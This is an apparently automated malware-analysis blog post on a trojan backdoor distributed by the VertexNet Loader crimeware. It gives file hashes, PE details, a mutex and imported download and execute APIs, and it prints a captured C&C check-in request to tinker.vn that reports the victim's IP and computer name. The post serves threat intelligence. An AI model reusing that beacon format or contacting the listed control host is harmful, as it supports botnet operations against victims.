Generic trojan type backdoor via popular crimeware “Loader”
Technical information & PE file attribute
MD5 : aab21e11953aee66ff16772576ceaec0
SHA1: 576910d3ae484144db32dd835594c605dac90a9d
[['Microsoft Visual C++ 8'], ['VC8 -> Microsoft Corporation']
This malware was created and is spread through crimeware "VertexNet Loader".
PE information & sections:
57.9% (.EXE) Win32 Executable MS Visual C++ (generic) (31206/45/13)
12.2% (.DLL) Win32 Dynamic Link Library (generic) (6581/28/2)
12.0% (.EXE) Win32 Executable Generic (6514/8/2)
10.3% (.EXE) Win64 Executable Generic (5563/38/1)
3.7% (.EXE) Generic Win/DOS Executable (2002/3)
Mutex: VN_MUTEX16
Optional Header: 0x400000Address Of Entry Point: 0xaf4a
Compile Time: 2011-06-20 11:05:05
Number of RVA and Sizes: 16
Number of Sections: 5
API Functions:
InternetReadFile
CreateProcess
WinExec
ShellExecute
URLDownloadToFileA
VT information about detection rate 35/42
VN_MUTEX16 is the string that is set as default "mutex" through internal constructor VertexNet Loader:
Information report in the C&C statistics
panel about infected machine:
This information is inserted into the database (default MySQL) of the crimeware. You
can see this information/C&C communication in traffic capture:
GET /x1/adduser.php?uid={52bacd1a-7586-11e0-a813-xxxxxxxxxxxx--1962905967}
&lan=XXX.XXX.XXX.XXX&cmpname=XXXXXXXXXX-59903E%20[Administrator]&country= &idle=0&ver=v1.2
HTTP/1.1
User-Agent: V32
Host: tinker.vn
You
can read more information about the functions, command and extract data in
infected machine for this crimeware in MalwareIntelligence post: VertexNetLoader crimeware timeline, popular functions and marketing scheme
VertexNet Loader crimeware C&C
In this
case, the malicious software have you control panel in hxxp://tinker.vn/x1/
** Information obtained through the automated process malware analysis of CrimewareAttack Service (by MalwareIntelligence).
Alex
0 comentarios:
Post a Comment